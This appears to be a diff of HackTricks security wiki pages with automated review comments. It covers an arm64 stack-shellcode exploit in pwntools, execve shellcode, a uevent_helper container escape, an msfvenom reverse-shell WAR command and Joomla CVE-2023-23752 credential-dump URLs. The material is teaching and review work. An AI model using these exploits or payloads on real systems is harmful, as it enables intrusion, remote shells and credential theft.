||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
|
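Review bot: the `## With PIE` / `### Off-by-2` section presents `ret2win_addr = p16(0x07d4)` as if it lands every time, but with PIE and ASLR enabled only the low 12 bits of the return address are stable; the fourth nibble written by a 2-byte overwrite is randomized, so this succeeds in 1 of 16 runs (the ret2win page's own Protections bullet says so). Either state that ASLR was disabled for the demo (`randomize_va_space`, as the sibling stack-shellcode-arm64 page does) or add the 1/16 caveat here. The `### Off-by-1` section under No PIE should likewise name its precondition: overwriting only the low two bytes works because the original return address into `main` and `win` (`0x00000000004006c4`) share the upper six bytes. Smaller points: `Stat gdb with gef` should be `Start gdb with gef`; `The offset is 72 (9x48)` should read `(0x48)`; the breakpoint is written as `b *vulnerable_function + 0xc` in one block and `b *vulnerable_function+28` in the next, so pick one style; the fence under `set a pattern such as 13371337` lacks the `bash` tag the other blocks use; `Find where this pattern is stored in memory` shows only a screenshot, so list the gdb/GEF command that was run; and `Actually this is going to by more like a off-by-2` should be `is going to be more like an off-by-2`.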
@ -214,6 +214,12 @@ Check the ret2esp technique here:
|
||||||
* [https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html](https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html)
|
* [https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html](https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html)
|
||||||
* 64 bit, no relro, canary, nx and pie. The program grants a leak for stack or pie and a WWW of a qword. First get the stack leak and use the WWW to go back and get the pie leak. Then use the WWW to create an eternal loop abusing `.fini_array` entries + calling `__libc_csu_fini` ([more info here](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini\_array.md)). Abusing this "eternal" write, it's written a ROP chain in the .bss and end up calling it pivoting with RBP.
|
* 64 bit, no relro, canary, nx and pie. The program grants a leak for stack or pie and a WWW of a qword. First get the stack leak and use the WWW to go back and get the pie leak. Then use the WWW to create an eternal loop abusing `.fini_array` entries + calling `__libc_csu_fini` ([more info here](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini\_array.md)). Abusing this "eternal" write, it's written a ROP chain in the .bss and end up calling it pivoting with RBP.
|
||||||
|
|
||||||
|
## ARM64
|
||||||
|
|
||||||
|
In ARM64, the **prologue and epilogues** of the functions **don't store and retrieve the SP registry** in the stack. Therefore, by default, you **won't be able to control the SP registry** by overwriting some data inside the stack.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
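Review bot: the new ARM64 paragraph's claim is correct but the reasoning behind it should be spelled out, and `SP registry` should be `SP register` (twice). The AArch64 prologue saves the frame pointer and link register with `stp x29, x30, [sp, #-N]!` and the epilogue restores them with `ldp x29, x30, [sp], #N`, adjusting SP by an immediate, so SP is never loaded from stack memory; on x86 `leave` does `mov rsp, rbp; pop rbp`, which is why a corrupted saved RBP becomes RSP and enables the pivots described earlier on this page. Stating that contrast gives the `by default` hedge its meaning and points at the exception: code that rebuilds SP from x29 (for example functions with variable-sized stack allocations) can still be redirected through the saved x29.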
@ -90,9 +90,9 @@ The **NOP slide** (`asm('nop')`) is used to increase the chance that execution w
|
||||||
|
|
||||||
## Protections
|
## Protections
|
||||||
|
|
||||||
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded.
|
* [**ASLR**](../../common-binary-protections-and-bypasses/aslr/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded.
|
||||||
* [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
|
* [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
|
||||||
* [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** protection would prevent the execution of the shellcode inside the stack because that region won't be executable.
|
* [**NX**](../../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** protection would prevent the execution of the shellcode inside the stack because that region won't be executable.
|
||||||
|
|
||||||
## Other Examples & References
|
## Other Examples & References
|
||||||
|
|
||||||
|
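Review bot: besides the `../../` depth fix, the ASLR bullet reads as copied from the ret2win page: it talks about `the address where the function will be stored` and `where is the win function loaded`, but on this page the target is the shellcode's address on the stack, not a function, so it should say that ASLR randomizes the stack base and therefore the address placed in the return slot, unless a stack leak is available (as the examples below use). In the Stack Canaries bullet `won't never be followed` should be `will never be followed`.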
@ -103,6 +103,8 @@ The **NOP slide** (`asm('nop')`) is used to increase the chance that execution w
|
||||||
* 32 bit, ASLR with stack leak, write shellcode and jump to it
|
* 32 bit, ASLR with stack leak, write shellcode and jump to it
|
||||||
* [https://guyinatuxedo.github.io/06-bof\_shellcode/tu18\_shellaeasy/index.html](https://guyinatuxedo.github.io/06-bof\_shellcode/tu18\_shellaeasy/index.html)
|
* [https://guyinatuxedo.github.io/06-bof\_shellcode/tu18\_shellaeasy/index.html](https://guyinatuxedo.github.io/06-bof\_shellcode/tu18\_shellaeasy/index.html)
|
||||||
* 32 bit, ASLR with stack leak, comparison to prevent call to exit(), overwrite variable with a value and write shellcode and jump to it
|
* 32 bit, ASLR with stack leak, comparison to prevent call to exit(), overwrite variable with a value and write shellcode and jump to it
|
||||||
|
* [https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/](https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/)
|
||||||
|
* arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
|
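Review bot: the new 8ksec bullet says `ROP gadget to make stack executable`; the linked post's title names the mechanism (`mprotect`), so `ROP chain calling mprotect to make the stack executable, then jump to the shellcode` tells the reader what the write-up is about. Also, this commit adds `stack-shellcode-arm64.md` next to this page, but neither hunk shown here links to it; the ret2win page gets an `## ARM64 Example` content-ref for its counterpart, and this page should get the same.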
@ -0,0 +1,107 @@
|
||||||
|
# Stack Shellcode - arm64
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
Find an introduction to arm64 in:
|
||||||
|
|
||||||
|
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
||||||
|
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
## Code 
|
||||||
|
|
||||||
|
```c
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
|
||||||
|
void vulnerable_function() {
|
||||||
|
char buffer[64];
|
||||||
|
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
vulnerable_function();
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
Compile without pie, canary and nx:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```bash
|
||||||
|
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
## No ASLR & No canary - Stack Overflow 
|
||||||
|
|
||||||
|
To stop ASLR execute:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
|
||||||
|
```
|
||||||
|
|
||||||
|
To get the [**offset of the bof check this link**](../ret2win/ret2win-arm64.md#finding-the-offset).
|
||||||
|
|
||||||
|
Exploit:
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
# Load the binary
|
||||||
|
binary_name = './bof'
|
||||||
|
elf = context.binary = ELF(binary_name)
|
||||||
|
|
||||||
|
# Generate shellcode
|
||||||
|
shellcode = asm(shellcraft.sh())
|
||||||
|
|
||||||
|
# Start the process
|
||||||
|
p = process(binary_name)
|
||||||
|
|
||||||
|
# Offset to return address
|
||||||
|
offset = 72
|
||||||
|
|
||||||
|
# Address in the stack after the return address
|
||||||
|
ret_address = p64(0xfffffffff1a0)
|
||||||
|
|
||||||
|
# Craft the payload
|
||||||
|
payload = b'A' * offset + ret_address + shellcode
|
||||||
|
|
||||||
|
print("Payload length: "+ str(len(payload)))
|
||||||
|
|
||||||
|
# Send the payload
|
||||||
|
p.send(payload)
|
||||||
|
|
||||||
|
# Drop to an interactive session
|
||||||
|
p.interactive()
|
||||||
|
```
|
||||||
|
|
||||||
|
The only "complicated" thing to find here would be the address in the stack to call. In my case I generated the exploit with the address found using gdb, but then when exploiting it it didn't work (because the stack address changed a bit).
|
||||||
|
|
||||||
|
I opened the generated **`core` file** (`gdb ./bog ./core`) and checked the real address of the start of the shellcode.
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
|
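Review bot: the exploit hard-codes `ret_address = p64(0xfffffffff1a0)` and the closing paragraphs admit the address observed in gdb did not work outside it because the stack shifted; two things worth documenting at that point rather than leaving the reader to rediscover them: gdb changes the inferior's environment (it sets `LINES` and `COLUMNS`, among other differences), which moves the stack, and the parent page's own NOP slide (`asm('nop')` in the `@ -90,9 +90,9` header) exists precisely so that a guessed address aimed into the middle of the sled tolerates such shifts. `gdb ./bog ./core` should be `gdb ./bof ./core`. The line `elf = context.binary = ELF(binary_name)` deserves a comment: it is what makes `shellcraft.sh()` emit aarch64 shellcode (pwntools defaults to i386 otherwise), so it must run before the shellcode is generated. Finally, `b'A' * offset + ret_address + shellcode` must stay within the 256 bytes `read` accepts, and the `Payload length` print is only useful if that bound is stated next to it.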
@ -28,6 +28,13 @@ When we run these two functions **sequentially**:
This behavior illustrates a key concept in low-level programming: **Memory management is crucial**, and uninitialized variables can lead to unpredictable behavior or security vulnerabilities, as they may unintentionally hold sensitive data left in memory.
This behavior illustrates a key concept in low-level programming: **Memory management is crucial**, and uninitialized variables can lead to unpredictable behavior or security vulnerabilities, as they may unintentionally hold sensitive data left in memory.
Uninitialized stack variables could pose several security risks like:
* **Data Leakage**: Sensitive information such as passwords, encryption keys, or personal details can be exposed if stored in uninitialized variables, allowing attackers to potentially read this data.
* **Information Disclosure**: The contents of uninitialized variables might reveal details about the program's memory layout or internal operations, aiding attackers in developing targeted exploits.
* **Crashes and Instability**: Operations involving uninitialized variables can result in undefined behavior, leading to program crashes or unpredictable outcomes.
* **Arbitrary Code Execution**: In certain scenarios, attackers could exploit these vulnerabilities to alter the program's execution flow, enabling them to execute arbitrary code, which might include remote code execution threats.
### Example
### Example
```c
```c
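Review bot: the "Data Leakage" and "Information Disclosure" bullets in the new risk list describe the same primitive (reading whatever was left in memory through an uninitialized variable) and differ only in what is read, secrets versus layout details; either merge them or make the second one concrete about what "details about the program's memory layout" means (a leftover stack or heap pointer, for instance) so the two entries are clearly distinct. Minor: "could pose several security risks like:" reads better as "such as:".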
@ -66,6 +73,10 @@ int main() {
* **`demonstrateUninitializedVar` Function**: In this function, we declare an integer variable `uninitializedVar` without initializing it. When we attempt to print its value, the output might show a random number. This number represents whatever data was previously at that memory location. Depending on the environment and compiler, the actual output can vary, and sometimes, for safety, some compilers might automatically initialize variables to zero, though this should not be relied upon.
* **`demonstrateUninitializedVar` Function**: In this function, we declare an integer variable `uninitializedVar` without initializing it. When we attempt to print its value, the output might show a random number. This number represents whatever data was previously at that memory location. Depending on the environment and compiler, the actual output can vary, and sometimes, for safety, some compilers might automatically initialize variables to zero, though this should not be relied upon.
* **`main` Function**: The `main` function calls both of the above functions in sequence, demonstrating the contrast between an initialized variable and an uninitialized one.
* **`main` Function**: The `main` function calls both of the above functions in sequence, demonstrating the contrast between an initialized variable and an uninitialized one.
## ARM64 Example
This doesn't change at all in ARM64 as local variables are also managed in the stack, you can [**check this example**](https://8ksec.io/arm64-reversing-and-exploitation-part-6-exploiting-an-uninitialized-stack-variable-vulnerability/) were this is shown.
<details>
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
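Review bot: in the new "ARM64 Example" paragraph, "were this is shown" should be "where this is shown", and the sentence is a run-on; split it: "This doesn't change at all in ARM64, as local variables are also managed on the stack. You can check this example, where this is shown."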
@ -185,6 +185,10 @@ It's common to have a cron job such as
to renew the all the domain certificates on the server. This means that even if the CA used for this doesn't set the time it was generated in the Validity time, it's possible to **find domains belonging to the same company in the certificate transparency logs**.\
to renew the all the domain certificates on the server. This means that even if the CA used for this doesn't set the time it was generated in the Validity time, it's possible to **find domains belonging to the same company in the certificate transparency logs**.\
Check out this [**writeup for more information**](https://swarm.ptsecurity.com/discovering-domains-via-a-time-correlation-attack/).
Check out this [**writeup for more information**](https://swarm.ptsecurity.com/discovering-domains-via-a-time-correlation-attack/).
### Mail DMARC information
You can use a web such as [https://dmarc.live/info/google.com](https://dmarc.live/info/google.com) or a tool such as [https://github.com/Tedixx/dmarc-subdomains](https://github.com/Tedixx/dmarc-subdomains) to find **domains and subdomain sharing the same dmarc information**.
### **Passive Takeover**
### **Passive Takeover**
Apparently is common for people to assign subdomains to IPs that belongs to cloud providers and at some point **lose that IP address but forget about removing the DNS record**. Therefore, just **spawning a VM** in a cloud (like Digital Ocean) you will be actually **taking over some subdomains(s)**.
Apparently is common for people to assign subdomains to IPs that belongs to cloud providers and at some point **lose that IP address but forget about removing the DNS record**. Therefore, just **spawning a VM** in a cloud (like Digital Ocean) you will be actually **taking over some subdomains(s)**.
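Review bot: the new "Mail DMARC information" paragraph says the tools find "domains and subdomain sharing the same dmarc information" without saying which part of the record is being correlated; state what field a match is based on (the example URL looks up the record for google.com, so the reader can see the fields there) so it is clear what a shared value implies about ownership. Wording: "a web such as" should be "a website such as", and "subdomain" should be "subdomains".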
@ -223,6 +227,10 @@ _Note that sometimes the domain is hosted inside an IP that is not controlled by
It's time to find all the possible subdomains of each found domain.
It's time to find all the possible subdomains of each found domain.
{% hint style="success" %}
Note that some of the tools and techniques to find domains can also help to find subdomains!
{% endhint %}
### **DNS**
### **DNS**
Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** (If vulnerable, you should report it).
Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** (If vulnerable, you should report it).
@ -14,7 +14,7 @@ Other ways to support HackTricks:
</details>
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../../.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
{% embed url="https://websec.nl/" %}
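Review bot: the figure path changes from the root-relative `/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif` to `../../../../.gitbook/assets/...`, which only resolves if this file sits exactly four directories below the repository root; the same replacement is made again in the second hunk of this file, so confirm the depth once and keep both occurrences in sync.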
@ -138,23 +138,23 @@ This directory permits access to modify kernel variables, usually via `sysctl(2)
* Writing to `/sys/kernel/uevent_helper` can execute arbitrary scripts upon `uevent` triggers.
* Writing to `/sys/kernel/uevent_helper` can execute arbitrary scripts upon `uevent` triggers.
* **Example for Exploitation**: %%%bash
* **Example for Exploitation**: %%%bash
## Creates a payload
### Creates a payload
echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper
echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper
## Finds host path from OverlayFS mount for container
### Finds host path from OverlayFS mount for container
host\_path=$(sed -n 's/._\perdir=(\[^,]_).\*/\1/p' /etc/mtab)
host\_path=$(sed -n 's/._\perdir=(\[^,]_).\*/\1/p' /etc/mtab)
## Sets uevent\_helper to malicious helper
### Sets uevent\_helper to malicious helper
echo "$host\_path/evil-helper" > /sys/kernel/uevent\_helper
echo "$host\_path/evil-helper" > /sys/kernel/uevent\_helper
## Triggers a uevent
### Triggers a uevent
echo change > /sys/class/mem/null/uevent
echo change > /sys/class/mem/null/uevent
## Reads the output
### Reads the output
cat /output %%%
cat /output %%%
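Review bot: changing `## Creates a payload` to `### Creates a payload` does not fix the real problem in this example, which is that the block is wrapped in `%%%bash` instead of a fenced code block, so every `#`-prefixed comment is rendered as a heading, the three commands `echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper` have been flattened onto one line with no newline or `;` between them, and the sed expression `sed -n 's/._\perdir=(\[^,]_).\*/\1/p'` has been markdown-escaped (`\_`, `\[`, `\*`) and would not parse as written. Put the whole example in a ```bash fence with one command per line and the regex unescaped, and keep the comments as `#` comments rather than headings.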
@ -187,7 +187,7 @@ This directory permits access to modify kernel variables, usually via `sysctl(2)
* [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc\_group\_understanding\_hardening\_linux\_containers-1-1.pdf)
* [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc\_group\_understanding\_hardening\_linux\_containers-1-1.pdf)
* [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container\_whitepaper.pdf)
* [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container\_whitepaper.pdf)
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../../.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
{% embed url="https://websec.nl/" %}
@ -519,6 +519,24 @@ _main:
```
```
{% endtab %}
{% endtab %}
{% tab title="with adr for linux" %}
```armasm
; From https://8ksec.io/arm64-reversing-and-exploitation-part-5-writing-shellcode-8ksec-blogs/
.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4).
_main:
adr x0, sh_path ; This is the address of "/bin/sh".
mov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve.
mov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve.
mov x16, #59 ; Move the execve syscall number (59) into x16.
svc #0x1337 ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16.
sh_path: .asciz "/bin/sh"
```
{% endtab %}
{% endtabs %}
{% endtabs %}
#### Read with cat
#### Read with cat
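Review bot: the new tab is titled "with adr for linux", but the listing is the macOS variant of the shellcode: `.section __TEXT,__text` and the `_main` entry label are Mach-O conventions, and `mov x16, #59` followed by `svc #0x1337` passes the syscall number in x16 with 59 as execve, which is the XNU calling convention. On Linux AArch64 the syscall number goes in x8, execve is 221 and the code section is `.text`, so this block would not run on the platform the tab names. Either retitle the tab to say it targets macOS (matching the 8ksec source it cites) or replace the body with an actual Linux listing; in both cases the comment on the `mov x16, #59` line should say which platform's syscall table the number comes from.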
@ -27,7 +27,7 @@ PORT STATE SERVICE REASON
## Inspecting the traffic
## Inspecting the traffic
hen a **CONNECT** packet is received by MQTT brokers, a **CONNACK** packet is sent back. This packet contains a return code which is crucial for understanding the connection status. A return code of **0x00** means that the credentials have been accepted, signifying a successful connection. On the other hand, a return code of **0x05** signals that the credentials are invalid, thus preventing the connection.
When a **CONNECT** packet is received by MQTT brokers, a **CONNACK** packet is sent back. This packet contains a return code which is crucial for understanding the connection status. A return code of **0x00** means that the credentials have been accepted, signifying a successful connection. On the other hand, a return code of **0x05** signals that the credentials are invalid, thus preventing the connection.
For instance, if the broker rejects the connection due to invalid credentials, the scenario would look something like this:
For instance, if the broker rejects the connection due to invalid credentials, the scenario would look something like this:
@ -60,7 +60,8 @@ You can also use:
```bash
```bash
apt-get install mosquitto mosquitto-clients
apt-get install mosquitto mosquitto-clients
mosquitto_sub -t 'test/topic' -v #Subscriribe to 'test/topic'
mosquitto_sub -t 'test/topic' -v #Subscribe to 'test/topic'
mosquitto_sub -h <host-ip> -t "#" -v #Subscribe to ALL topics.
```
```
Or you could **run this code to try to connect to a MQTT service without authentication, subscribe to every topic and listen them**:
Or you could **run this code to try to connect to a MQTT service without authentication, subscribe to every topic and listen them**:
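Review bot: the comment on the new line `mosquitto_sub -h <host-ip> -t "#" -v #Subscribe to ALL topics.` overstates what `#` matches: in MQTT a wildcard filter does not match topic names that begin with `$`, so the broker's own `$SYS/` status topics are not included; add a second `-t '$SYS/#'` or reword the comment to "all application topics". The preceding `mosquitto_sub -t 'test/topic' -v` line has no `-h`, so it talks to localhost by default; adding `-h <host-ip>` there as well keeps the two commands consistent.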
@ -44,7 +44,7 @@ vncviewer [-passwd passwd.txt] <IP>::5901
Default **password is stored** in: \~/.vnc/passwd
Default **password is stored** in: \~/.vnc/passwd
If you have the VNC password and it looks encrypted (a few bytes, like if it could be and encrypted password). It is probably ciphered with 3des. You can get the clear text password using [https://github.com/jeroennijhof/vncpwd](https://github.com/jeroennijhof/vncpwd)
If you have the VNC password and it looks encrypted (a few bytes, like if it could be an encrypted password), it is probably ciphered with 3des. You can get the clear text password using [https://github.com/jeroennijhof/vncpwd](https://github.com/jeroennijhof/vncpwd)
```bash
```bash
make
make
@ -285,6 +285,7 @@ Tools:
* [https://github.com/google/fuzzing/tree/master/dictionaries](https://github.com/google/fuzzing/tree/master/dictionaries)
* [https://github.com/google/fuzzing/tree/master/dictionaries](https://github.com/google/fuzzing/tree/master/dictionaries)
* [https://github.com/six2dez/OneListForAll](https://github.com/six2dez/OneListForAll)
* [https://github.com/six2dez/OneListForAll](https://github.com/six2dez/OneListForAll)
* [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)
* [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)
* [https://github.com/ayoubfathi/leaky-paths](https://github.com/ayoubfathi/leaky-paths)
* _/usr/share/wordlists/dirb/common.txt_
* _/usr/share/wordlists/dirb/common.txt_
* _/usr/share/wordlists/dirb/big.txt_
* _/usr/share/wordlists/dirb/big.txt_
* _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_
* _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_
@ -92,6 +92,16 @@ droopescan scan joomla --url http://joomla-site.local/
In[ **80,443 - Pentesting Web Methodology is a section about CMS scanners**](./#cms-scanners) that can scan Joomla.
In[ **80,443 - Pentesting Web Methodology is a section about CMS scanners**](./#cms-scanners) that can scan Joomla.
### API Unauthenticated Information Disclosure:
Versions From 4.0.0 to 4.2.7 are vulnerable to Unauthenticated information disclosure (CVE-2023-23752) that will dump creds and other information.
* Users: `http://<host>/api/v1/users?public=true`
* Config File: `http://<host>/api/index.php/v1/config/application?public=true`
**MSF Module**: `scanner/http/joomla_api_improper_access_checks` or ruby script: [51334](https://www.exploit-db.com/exploits/51334)
### Brute-Force
### Brute-Force
You can use this [script](https://github.com/ajnik/joomla-bruteforce) to attempt to brute force the login.
You can use this [script](https://github.com/ajnik/joomla-bruteforce) to attempt to brute force the login.
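Review bot: in the new CVE-2023-23752 section the two endpoints are written with different base paths, `http://<host>/api/v1/users?public=true` versus `http://<host>/api/index.php/v1/config/application?public=true`; say whether both the `/api/index.php/v1/` and the rewritten `/api/v1/` form work for both endpoints, or use one form consistently so readers do not assume the difference is significant. Also "Versions From 4.0.0 to 4.2.7" should be lower-case "from", the heading should not end with a colon, and naming the fixed release next to the vulnerable range would give readers the remediation check as well as the detection one.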
@ -75,8 +75,8 @@ A hop-by-hop header is a header which is designed to be processed and consumed b
* **`Age`** defines the times in seconds the object has been in the proxy cache.
* **`Age`** defines the times in seconds the object has been in the proxy cache.
* **`Server-Timing: cdn-cache; desc=HIT`** also indicates that a resource was cached
* **`Server-Timing: cdn-cache; desc=HIT`** also indicates that a resource was cached
{% content-ref url="../../pentesting-web/cache-deception.md" %}
{% content-ref url="../../pentesting-web/cache-deception/" %}
[cache-deception.md](../../pentesting-web/cache-deception.md)
[cache-deception](../../pentesting-web/cache-deception/)
{% endcontent-ref %}
{% endcontent-ref %}
**Local Cache headers**:
**Local Cache headers**:
@ -161,7 +161,7 @@ msf exploit(multi/http/tomcat_mgr_upload) > exploit
1. Create the war to deploy:
1. Create the war to deploy:
```bash
```bash
msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
```
```
2. Upload the `revshell.war` file and access to it (`/revshell/`):
2. Upload the `revshell.war` file and access to it (`/revshell/`):
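Review bot: the payload change to `java/jsp_shell_reverse_tcp` is fine, but `LPORT=<LHOST_IP>` in both the old and the new `msfvenom` line is the wrong placeholder; it should be `LPORT=<LPORT>` (a port number, not an address), otherwise anyone copying the command produces a WAR that calls back to a nonsensical port.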
@ -9,12 +9,11 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
